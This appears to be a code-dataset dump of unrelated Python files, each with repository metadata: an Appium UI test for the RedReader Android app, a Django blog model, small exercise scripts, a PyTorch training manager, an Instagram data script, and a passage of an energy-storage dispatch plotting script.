7b25d3a0b38ecf71f28ab8ade8d455c4f755784e | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/redreader/testcase/firstcases/testcase8_000.py | 487ccbe5525b05345cc0e3f99e97b78ace629218 | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.quantumbadger.redreader',
'appActivity' : 'org.quantumbadger.redreader.activities.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.quantumbadger.redreader/org.quantumbadger.redreader.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase000
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"All Subreddits\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.TextView\").description(\"Sort Posts\")")
TouchAction(driver).long_press(element).release().perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().className(\"android.widget.TextView\").description(\"Sort Posts\")")
TouchAction(driver).long_press(element).release().perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"8_000\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.quantumbadger.redreader'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
c74462826047dc31ce78bc75478dd40b6448f120 | ef9cb55b02ababca58ce6880b575120c4f28fdb9 | /blog/models.py | acf0d8f124a21c803016a1554c92811cf188da95 | [] | no_license | mikohan/portfolio | dc6226f3aee73b5af181a0ecc9a13668dde2fe4e | 51fda71a4fecec77ff207eb94e514f6924eaf44e | refs/heads/master | 2020-05-30T09:11:51.866902 | 2019-06-04T05:29:27 | 2019-06-04T05:29:27 | 189,637,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=255)
pub_date = models.DateTimeField()
body = models.TextField()
image = models.ImageField(upload_to='images/')
def __str__(self):
return self.title
def cut(self):
split = self.body.split()
desc = ' '.join(split[:40])
return desc
def pub_date_pretty(self):
return self.pub_date.strftime('%b %e %Y')
| [
"angara99@gmail.com"
] | angara99@gmail.com |
1a055dfbf5d07851bccb01930a4c863d0fb61b84 | a26630a4a64824603a78f39553e21ae9335bf1f9 | /env/bin/jupyter-qtconsole | b3abca9c7ca3903800a87bde1ac9375889978196 | [
"MIT"
] | permissive | rjhans7/pydata-berlin-2017 | 235b4b990197fedc3f5e59be677df5cae0d8da9c | f0ed356d803f283552597a628af8a4e9deebe49d | refs/heads/master | 2020-06-04T03:11:47.776383 | 2019-06-13T23:28:38 | 2019-06-13T23:28:38 | 191,845,655 | 0 | 0 | null | 2019-06-13T23:22:56 | 2019-06-13T23:22:56 | null | UTF-8 | Python | false | false | 279 | #!/home/roosevelt/Documentos/Duckiebot/pydata-berlin-2017/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from qtconsole.qtconsoleapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"roosevelt.ubaldo@outlook.com"
] | roosevelt.ubaldo@outlook.com | |
b91e3e270ea84859952db642e0695052e85dbb6c | f5a5595e1b305ff5a173e1007a4042b1f23182c1 | /Programs/atm_management.py | 6e506e8df78eccfa80dee22c0cd48ba611f80086 | [] | no_license | 3NCRY9T3R/H4CKT0B3RF3ST-2020 | b400c04a411efa40b1e4a4f80fa0f8c3e99fa2df | c56969c05dbda584ff8980b08b9ef1cf1dbe6c42 | refs/heads/main | 2023-08-30T06:07:18.051006 | 2020-11-12T17:47:40 | 2020-11-12T17:47:40 | 300,406,803 | 87 | 186 | null | 2022-09-25T16:21:44 | 2020-10-01T19:52:31 | C++ | UTF-8 | Python | false | false | 1,603 | py | d={}
def deposit(n):
amt=int(input("\nenter the amount you want to deposit"))
d[n][1]=d[n][1]+amt
print(d[n])
def withdraw():
amt=int(input("\nenter the amount you want to withdraw"))
if(d[n][1]>=amt):
d[n][1]=d[n][1]-amt
else:
print("amount is not sufficient")
print(d[n])
def chkamt():
print("\nYour balance is ",d[n][1])
def transfer():
b=input("\nenter the name of account in which you want to transfer")
if b in d:
amt1=int(input("\nenter the amount you want to transfer"))
if(d[n][1]>amt1):
d[n][1]=d[n][1]-amt1
d[b][1]=d[b][1]+amt1
print("balance of n is ",d[n][1])
else:
print("amount not sufficient")
else:
print("entry not found")
n=int(input('Enter range'))
for i in range(0,n):
name=input('Enter Name')
f=input('enter password')
c=int(input('enter balance'))
list=[f,c]
d[name]=list
print(d)
n=input('enter name')
if n in d:
p=input('enter password')
if p in d[n][0]:
print("enter 1:Deposit\n 2:Withdraw\n 3:Transfer\n 4:Check Amount")
while(1):
a=int(input("enter the number"))
if a==1:
deposit(n)
elif a==2:
withdraw()
elif a==3:
transfer()
elif a==4:
chkamt()
else:
print("Please enter correct number")
break
else:
print("incorrect password")
else:
print("entry not found")
| [
"noreply@github.com"
] | 3NCRY9T3R.noreply@github.com |
6a6cb216fa9aee4db2182b77261d6d65dfd2fed7 | d7d524d1c0ba1cf62cdbc2f9bf5b9c66fa56726b | /armstrong interval.py | 626c90c1598da113f54258b1c5f678f4dccdac20 | [] | no_license | ramyasutraye/pythonproject | d997ca5ada024e211b6bf087d0d56684daf9df8b | 38975a99eb3ee1ad9e79a9efd538cc992d249fc3 | refs/heads/master | 2020-04-23T19:30:10.128774 | 2018-05-25T06:18:53 | 2018-05-25T06:18:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | a = int(input("Enter lower range: "))
b = int(input("Enter upper range: "))
for num in range(a, b + 1):
order = len(str(num))
sum = 0
temp = num
while temp > 0:
digit = temp % 10
sum += digit ** order
temp //= 10
if num == sum:
print(num)
| [
"noreply@github.com"
] | ramyasutraye.noreply@github.com |
4e88153bccadd64828090d4a40171e0fc6dc6fce | 55e5bb8f31c6939fb77317973b587c0e9446f996 | /model_manager.py | cc7964ef045248cfe79d73cf91249c75d06d29d5 | [
"MIT"
] | permissive | zwcdp/Classification-on-FashionMNIST | 3f7ce376e4046cf7b957ccef7c8f38e3256a8681 | 1d90b1a7bd49a9490b48a756ad7cd4151474f3bb | refs/heads/master | 2020-04-19T08:08:15.884314 | 2019-01-24T15:35:29 | 2019-01-24T15:35:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,752 | py | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
def get_string(*args):
string = ''
for s in args:
string = string + ' ' + str(s)
return string
class Manaeger():
def __init__(self, model, args):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.model = model.to(self.device)
self.lr = args.lr
self.metric = nn.CrossEntropyLoss()
self.optimizer = optim.Adam(self.model.parameters(), lr= self.lr)
self.epoch_num = args.epoch_num
self.batch_size = args.batch_size
self.save_name = args.save
self.log_file = open(args.log, 'w')
self.check_batch_num = args.check_batch_num
self.best = (0, 0) #(epoch num, validation acc)
load_name = args.load
if load_name != None:
weight = torch.load(load_name)
self.model.load_state_dict(weight)
def load_data(self, train_loader, valid_loader):
self.train_loader = train_loader
self.valid_loader = valid_loader
def record(self, message):
self.log_file.write(message)
print(message)
def get_info(self):
info = get_string('Model:', self.model.name(), '\n')
info = get_string(info, 'Learning rate:', self.lr, '\n')
info = get_string(info, 'Epoch number:', self.epoch_num, '\n')
info = get_string(info, 'Batch size:', self.batch_size, '\n')
info = get_string(info, 'Weight name:', self.save_name, '\n')
info = get_string(info, 'Log file:', self.log_file, '\n')
info = get_string(info, '=======================\n\n')
return info
def train(self):
info = self.get_info()
self.record(info)
self.model.train()
for epoch in range(self.epoch_num):
for batch_id, (imgs, labels) in enumerate(self.train_loader):
imgs, labels = imgs.to(self.device), labels.to(self.device)
out = self.model(imgs)
loss = self.metric(out, labels)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if (batch_id % self.check_batch_num == 0):
result = get_string('Epoch',epoch, '| batch', batch_id, '| Training loss :', loss.item(),'\n')
self.record(result)
self.validate(epoch)
info = get_string('\n# The best model is at epoch', self.best[0], 'with accuracy', self.best[1])
self.record(info)
def validate(self, epoch):
self.model.eval()
loss_total = 0
correct_total = 0
for batch_id, (imgs, labels) in enumerate(self.valid_loader):
imgs, labels = imgs.to(self.device), labels.to(self.device)
out = self.model(imgs)
loss = self.metric(out, labels)
loss_total += loss.item()
pred = out.max(1)[1]
correct = sum(pred == labels).item()
correct_total += correct
loss_avg = loss_total / (batch_id + 1)
acc = correct_total / ((batch_id + 1) * self.batch_size)
line = '\n----------------------------\n'
info = get_string('Validation result for ', epoch, 'epoch\n')
info = get_string(info,'Average loss:', loss_avg, '\n Accuracy:', acc)
info = get_string(line, info, line)
self.record(info)
if acc > self.best[1]:
self.best = (epoch, acc)
torch.save(self.model.state_dict(), self.save_name)
self.record('***** Saved best model! *****\n')
if __name__ == '__main__':
pass | [
"noreply@github.com"
] | zwcdp.noreply@github.com |
122581a07e2d8070c9962d222f51972503a5222d | e7ceb2199a6828a9f8e23eebabca8431397ddaa5 | /turtlecreeklane/python/connections.py | c18a8cdba6d6b32a663febf78a79e5188f375a25 | [] | no_license | houta483/instagramHoughton | ffa5688f08374a60aa5f266b86da7767700b0870 | 54926677b71dcacf637f99dfded9bef13879fee7 | refs/heads/master | 2022-12-20T05:27:22.412263 | 2020-04-09T14:23:51 | 2020-04-09T14:23:51 | 248,631,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | import json, pyautogui, re, math, os
from random import randint
import pandas as pd
import tkinter as tk
from datetime import datetime
from dateutil.parser import parse
# ALL THE POTENTIAL DATA WE CAN GET FROM CONNECTIONS
# with open('/Users/Tanner/code/products/Instagram/data.json') as f:
# data = json.load(f)
# rawFollowers = data['followers']
# prettyFollowers = json.dumps(rawFollowers, indent=4)
# rawBlockedUsers = data['blocked_users']
# prettyFollowers = json.dumps(rawBlockedUsers, indent=4)
# rawRestricedUsers = data['restricted_users']
# prettyFollowers = json.dumps(rawRestricedUsers, indent=4)
# rawFollowRequestsSent = data['follow_requests_sent']
# prettyFollowers = json.dumps(rawFollowRequestsSent, indent=4)
# rawFolloring = data['following']
# prettyFollowers = json.dumps(rawFolloring, indent=4)
# rawFollowingHashtags = data['following_hashtags']
# prettyFollowers = json.dumps(rawFollowingHashtags, indent=4)
# rawWhitelistedForSponsorTaggingBy = data['whitelisted_for_sponsor_tagging_by']
# prettyFollowers = json.dumps(rawWhitelistedForSponsorTaggingBy, indent=4)
# rawDismissedSuggestedUSers = data['dismissed_suggested_users']
# prettyFollowers = json.dumps(rawDismissedSuggestedUSers, indent=4)
def createDatabaseAndPopulateWithFollowersDateAndTime(json_file):
with open(json_file) as f:
data = json.load(f)
rawFollowers = data['followers']
df = pd.DataFrame({"IG Handle": ["---"], 'Date Started Following': ['-'], 'Time Started Following': ['-'], 'First Name': ['-'],
'Last Name': ['-'], 'Home State': ['-'], 'Home City': ['-'], 'Aprx Household Income': ['-'],
'Date of Last Story View': ['-'], 'Date of Last Story Engagement': ['-'], '# of Story Engagements': ['-'],
'# of Story Swipe Ups': ['-'], 'Date of Last Post Engagement': ['-'], '# of Post Engagements': ['-'],
'# Post Likes': ['-'], '# of Post Comments': ['-'], 'Response to Story Question Stickers': ['->']})
count = 0
for index in enumerate(rawFollowers.items()):
count = count + 1
print(count)
if (count == 100):
break
dateTime = str(index[1][1])
date = dateTime.split("T")[0]
date = date.split('-')
date = f"{date[1]}-{date[2]}-{date[0]}"
finalDate = datetime.strptime(date, '%m-%d-%Y').date()
time = dateTime.split("T")[1]
finalTime = time.split("+")[0]
df1 = pd.DataFrame({
"IG Handle": [index[1][0]],
'Date Started Following': [finalDate],
'Time Started Following': [finalTime]
})
df = df.append(df1, ignore_index=True)
datatoexcel = pd.ExcelWriter(
"/Users/Tanner/code/products/Instagram/database/InstagramFollowerData.xlsx", engine="xlsxwriter")
df.to_excel(datatoexcel, sheet_name="sheet1")
datatoexcel.save()
if __name__ =="__main__":
if (os.path.exists('/Users/Tanner/code/products/Instagram/database/InstagramFollowerData.xlsx') == False):
createDatabaseAndPopulateWithFollowersDateAndTime()
| [
"houta483@uchicago.edu"
] | houta483@uchicago.edu |
f98141f7c57d16d1a6e2f831aa4d808b9bec153c | 132c55f17da675a2d97e286fdbe21eece5c1435d | /SEM-1.2/Making_Figures/MainFigures_May2020/figure2_dispatch.py | d3764cdf4763dacad3d87dc18e3b19811f8b4a48 | [] | no_license | jacquelinedowling/SEM-long-duration-storage | 19c8a14e8ed43de205f7338d081fea428a1a16f2 | e8171f29cb5624deb5f8ef803680b85169ab3d89 | refs/heads/master | 2022-12-02T02:42:31.370055 | 2020-08-14T21:09:46 | 2020-08-14T21:09:46 | 278,500,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,898 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 6 16:44:40 2018
@author: jacquelinedowling
"""
##===========================================
#Import stuff
##===========================================
from __future__ import division
import os
import sys
import copy
import numpy as np
import pickle
import numpy as np
from numpy import genfromtxt
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.ticker as ticker
import datetime
from matplotlib.dates import DayLocator, MonthLocator, HourLocator, AutoDateLocator, DateFormatter, drange
from matplotlib.dates import MO, TU, WE, TH, FR, SA, SU, WeekdayLocator
from numpy import arange
from matplotlib.ticker import ScalarFormatter
from matplotlib.ticker import FormatStrFormatter
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import matplotlib.colors as color
solar_c = 'orange'
wind_c = 'blue'
pgp_c = 'pink'
batt_c = 'purple'
dem_c = 'black'
##===========================================
#Read in Base Case: PGP Batteries, Wind Solar
##===========================================
##/Users/jacquelinedowling/SEM-1.1/Output_Data/newcosts/newcosts_PGPbatt_SolarWind.pickle
pickle_in = open('/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Output_Data/Oct29_combos/Oct29_combos_SolarWind_PGPbatt.pickle', 'rb')
#pickle_in = open('/Users/jacquelinedowling/Documents/SEM-1.1_20190114/Output_Data/PGPtest5/PGPtest5_WindSolarPGPBatt_2015.pickle','rb')
base = pickle.load(pickle_in)
##===========================================
#Supporting Functions
##===========================================
def func_time_conversion (input_data, window_size, operation_type = 'mean'):
# NOTE: THIS FUNCTION HAS ONLY BEEN VERIFIED FOR PROPER WRAP-AROUND BEHAVIOR
# FOR 'mean'
# For odd windows sizes, easy. For even need to consider ends where you have half hour of data.
N_periods = len(input_data)
input_data_x3 = np.concatenate((input_data,input_data,input_data))
half_size = window_size / 2.
half_size_full = int(half_size) # number of full things for the mean
output_data = np.zeros(len(input_data))
for ii in range(len(output_data)):
if half_size != float (half_size_full): # odd number, easy
if (operation_type == 'mean'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])/ float(window_size)
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
elif(operation_type == 'sum'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
else: # even number need to include half of last ones
if (operation_type == 'mean'):
output_data[ii] = ( np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ]) \
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5) / window_size
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'sum'):
output_data[ii] = (
np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ])
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5
)
return output_data
##===========================================
def func_find_period (input_data):
window_size = input_data['window_size']
eff_window_size = copy.deepcopy(window_size) # If even go up to next odd number
if eff_window_size == 2 * int (eff_window_size /2 ): # check if even
eff_window_size = eff_window_size + 1 # if so, add 1
data = input_data['data']
search_option = input_data['search_option']
print_option = input_data['print_option']
# -------------------------------------------------------------------------
# Get the down-scaled data
data_in_window = func_time_conversion(data, eff_window_size, 'mean')
# -------------------------------------------------------------------------
if search_option == 'max':
center_index = int(np.argmax(data_in_window))
value = np.max(data_in_window)
elif search_option == 'min':
center_index = int(np.argmin(data_in_window))
value = np.min(data_in_window)
# -------------------------------------------------------------------------
# If interval would go over boundary, then move inteval
if center_index < int(eff_window_size/2):
center_index = int(eff_window_size/2)
if center_index > len(data)- int(eff_window_size/2) - 1:
center_index = len(data) - 1 - int(eff_window_size/2)
# The same algorithm as in func_time_conversion()
left_index = center_index - int(eff_window_size/2)
right_index = center_index + int(eff_window_size/2)
# -------------------------------------------------------------------------
# output
if print_option == 1:
print ( 'center index = {}, value = {}'.format(center_index, value))
print ( 'left index = {}, right index = {}'.format(left_index, right_index))
output = {
'value': value,
'left_index': left_index,
'right_index': right_index,
'center_index': center_index,
}
return output
##===========================================
def get_cost_contributions(base):
info = base[0]
inputs = base[1]
results = base[2]
# Costs over time
wind_t = (np.multiply(inputs["FIXED_COST_WIND"], results["CAPACITY_WIND"]) +
np.multiply(inputs["VAR_COST_WIND"], results["DISPATCH_WIND"]) )
solar_t = (np.multiply(inputs["FIXED_COST_SOLAR"], results["CAPACITY_SOLAR"]) +
np.multiply(inputs["VAR_COST_SOLAR"], results["DISPATCH_SOLAR"]) )
pgp_t = (np.multiply(inputs["FIXED_COST_PGP_STORAGE"], results["CAPACITY_PGP_STORAGE"]) +
np.multiply(inputs["FIXED_COST_TO_PGP_STORAGE"], results["CAPACITY_TO_PGP_STORAGE"]) +
np.multiply(inputs["FIXED_COST_FROM_PGP_STORAGE"], results["CAPACITY_FROM_PGP_STORAGE"]) +
np.multiply(inputs["VAR_COST_TO_PGP_STORAGE"], results["DISPATCH_TO_PGP_STORAGE"]) +
np.multiply(inputs["VAR_COST_FROM_PGP_STORAGE"], results["DISPATCH_FROM_PGP_STORAGE"]) )
batt_t = (np.multiply(inputs["FIXED_COST_STORAGE"], results["CAPACITY_STORAGE"]) +
np.multiply(inputs["VAR_COST_TO_STORAGE"], results["DISPATCH_TO_STORAGE"]) +
np.multiply(inputs["VAR_COST_FROM_STORAGE"], results["DISPATCH_FROM_STORAGE"]) )
# Mean costs
wind_m = np.mean(wind_t)
solar_m = np.mean(solar_t)
pgp_m = np.mean(pgp_t)
batt_m = np.mean(batt_t)
# print('System Cost Contributions =')
# print(results['SYSTEM_COST'])
# print('My calcs =')
# calc_sys_cost = wind_m + solar_m + pgp_m + batt_m
# print(calc_sys_cost)
return wind_m, solar_m , pgp_m, batt_m
#=========================================
info = base[0]
inputs = base[1]
results = base[2]
#print('Base')
#print('=====================INFO====================================================================')
#print(info)
#print('=====================INPUTS====================================================================')
#print(inputs)
#print('=====================RESULTS====================================================================')
#print(results)
##===========================================================================================================
# (Figure 1: Dispatch Curves)
##============================================================================================================
# 5-day averaging
hours_to_avg = 5*24
demand_source = func_time_conversion(inputs['DEMAND_SERIES'], hours_to_avg)
wind_source = func_time_conversion(results['DISPATCH_WIND'], hours_to_avg)
solar_source = func_time_conversion(results['DISPATCH_SOLAR'], hours_to_avg)
batt_source = func_time_conversion(results['DISPATCH_FROM_STORAGE'], hours_to_avg)
pgp_source = func_time_conversion(results['DISPATCH_FROM_PGP_STORAGE'], hours_to_avg)
demand_sink = np.multiply(func_time_conversion(inputs['DEMAND_SERIES'], hours_to_avg), -1)
batt_sink = np.multiply(func_time_conversion(results['DISPATCH_TO_STORAGE'], hours_to_avg), -1)
pgp_sink = np.multiply(func_time_conversion(results['DISPATCH_TO_PGP_STORAGE'], hours_to_avg), -1)
#=================
#Electricity Sources AND Sinks
#=======================================================
#Figure size settings
#=======================================================
plt.rcParams.update({'axes.titlesize': 'large'})
plt.rcParams.update({'axes.labelsize': 'large'})
#import matplotlib.pylab as pylab
#params = {'legend.fontsize': 'large',
# 'figure.figsize': (12, 6), #7 3.5
# 'axes.labelsize': 'x-large',
# 'axes.titlesize':'x-large',
# 'xtick.labelsize':'large',
# 'ytick.labelsize':'large'}
#pylab.rcParams.update(params)
import matplotlib.pylab as pylab
params = {'legend.fontsize': 'large',
'figure.figsize': (12, 6), #7 3.5
'axes.labelsize': 'x-large',
'axes.titlesize':'x-large',
'xtick.labelsize':'large',
'ytick.labelsize':'large'}
pylab.rcParams.update(params)
date1 = datetime.datetime(2017, 1, 1, 0)
date2 = datetime.datetime(2017, 12, 31, 23)
delta = datetime.timedelta(hours=1)
quick_dates = drange(date1, date2, delta)
print(len(quick_dates))
x = quick_dates
y1 = np.vstack([wind_source, solar_source, batt_source, pgp_source ])
pal1 = [wind_c, solar_c, batt_c, pgp_c]
labels1 = ["Wind", "Solar", "Battery", "PGP"]
y2 = np.vstack([demand_sink, pgp_sink, batt_sink])
pal2 = [dem_c, pgp_c, batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
#fig, (ax1, ax2, ax3) = plt.subplots(2, 2, sharey=True)
fig = plt.figure()
ax3 = plt.subplot2grid((2, 4), (0, 0), colspan=2, rowspan=2)
#ax3 = plt.subplot(211)
ax3.stackplot(x, y1, colors=pal1, labels=labels1)
ax3.stackplot(x, y2, colors=pal2, labels=labels2)
ax3.plot(x, demand_source, '-', color=dem_c, linewidth=1.2)
ax3.set_xlim(quick_dates[0], quick_dates[-1])
ax3.set_ylim(-2, 2)
#ax3.legend(loc='upper center', bbox_to_anchor=(1.2, 1.04))
chartBox = ax3.get_position()
ax3.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
ax3.xaxis.set_major_locator(AutoDateLocator())
ax3.xaxis.set_major_formatter(DateFormatter('%b'))
ax3.xaxis.set_tick_params(direction='out', which='both')
ax3.yaxis.set_tick_params(direction='out', which='both')
ax3.yaxis.set_major_locator(ticker.MultipleLocator(1))
#plt.xticks(rotation=30, ha='right')
#ax3.set_ylabel('Electricity sources and sinks (kW)')
#ax3.set_xlabel('Time')
#fig.autofmt_xdate()
#ax3.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('sources_sinks.eps', bbox_inches='tight')
#plt.show()
##=================
##=================
##=================
##=================
##=================
#from __future__ import division
#import os
#import sys
#import copy
#import numpy as np
#
#
##Find 5-day periods
###===========================================
##Import stuff
###===========================================
#import pickle
#import numpy as np
#from numpy import genfromtxt
#import matplotlib.pyplot as plt
#import matplotlib.gridspec as gridspec
#import matplotlib.ticker as ticker
#
#
#import datetime
#from matplotlib.dates import DayLocator, MonthLocator, HourLocator, AutoDateLocator, DateFormatter, drange
#from matplotlib.dates import MO, TU, WE, TH, FR, SA, SU, WeekdayLocator
#from numpy import arange
#from matplotlib.ticker import ScalarFormatter
#from matplotlib.ticker import FormatStrFormatter
#
#import matplotlib.cm as cm
#import matplotlib.mlab as mlab
##===========================================
def func_time_conversion (input_data, window_size, operation_type = 'mean'):
# NOTE: THIS FUNCTION HAS ONLY BEEN VERIFIED FOR PROPER WRAP-AROUND BEHAVIOR
# FOR 'mean'
# For odd windows sizes, easy. For even need to consider ends where you have half hour of data.
N_periods = len(input_data)
input_data_x3 = np.concatenate((input_data,input_data,input_data))
half_size = window_size / 2.
half_size_full = int(half_size) # number of full things for the mean
output_data = np.zeros(len(input_data))
for ii in range(len(output_data)):
if half_size != float (half_size_full): # odd number, easy
if (operation_type == 'mean'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])/ float(window_size)
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
elif(operation_type == 'sum'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
else: # even number need to include half of last ones
if (operation_type == 'mean'):
output_data[ii] = ( np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ]) \
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5) / window_size
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'sum'):
output_data[ii] = (
np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ])
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5
)
return output_data
##===========================================
def func_find_period (input_data):
window_size = input_data['window_size']
eff_window_size = copy.deepcopy(window_size) # If even go up to next odd number
if eff_window_size == 2 * int (eff_window_size /2 ): # check if even
eff_window_size = eff_window_size + 1 # if so, add 1
data = input_data['data']
search_option = input_data['search_option']
print_option = input_data['print_option']
# -------------------------------------------------------------------------
# Get the down-scaled data
data_in_window = func_time_conversion(data, eff_window_size, 'mean')
# -------------------------------------------------------------------------
if search_option == 'max':
center_index = int(np.argmax(data_in_window))
value = np.max(data_in_window)
elif search_option == 'min':
center_index = int(np.argmin(data_in_window))
value = np.min(data_in_window)
# -------------------------------------------------------------------------
# If interval would go over boundary, then move inteval
if center_index < int(eff_window_size/2):
center_index = int(eff_window_size/2)
if center_index > len(data)- int(eff_window_size/2) - 1:
center_index = len(data) - 1 - int(eff_window_size/2)
# The same algorithm as in func_time_conversion()
left_index = center_index - int(eff_window_size/2)
right_index = center_index + int(eff_window_size/2)
# -------------------------------------------------------------------------
# output
if print_option == 1:
print ( 'center index = {}, value = {}'.format(center_index, value))
print ( 'left index = {}, right index = {}'.format(left_index, right_index))
output = {
'value': value,
'left_index': left_index,
'right_index': right_index,
'center_index': center_index,
}
return output
##===========================================
##=====================================================
pickle_in = open('/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Output_Data/Oct29_combos/Oct29_combos_SolarWind_PGPbatt.pickle', 'rb')
#pickle_in = open('/Users/jacquelinedowling/Documents/SEM-1.1_20190114/Output_Data/PGPtest5/PGPtest5_WindSolarPGPBatt_2015.pickle','rb')
base = pickle.load(pickle_in)
info = base[0]
inputs = base[1]
results = base[2]
demand_source = inputs['DEMAND_SERIES']
wind_source = results['DISPATCH_WIND']
solar_source = results['DISPATCH_SOLAR']
batt_source = results['DISPATCH_FROM_STORAGE']
pgp_source = results['DISPATCH_FROM_PGP_STORAGE']
demand_sink = inputs['DEMAND_SERIES']
batt_sink = results['DISPATCH_TO_STORAGE']
pgp_sink = results['DISPATCH_TO_PGP_STORAGE']
study_variable_dict_1 = {
'window_size': 5*24,
'data': results['DISPATCH_FROM_PGP_STORAGE'],
'print_option': 0,
'search_option': 'max'
}
study_variable_dict_2 = {
'window_size': 5*24,
'data': results['DISPATCH_FROM_STORAGE'],
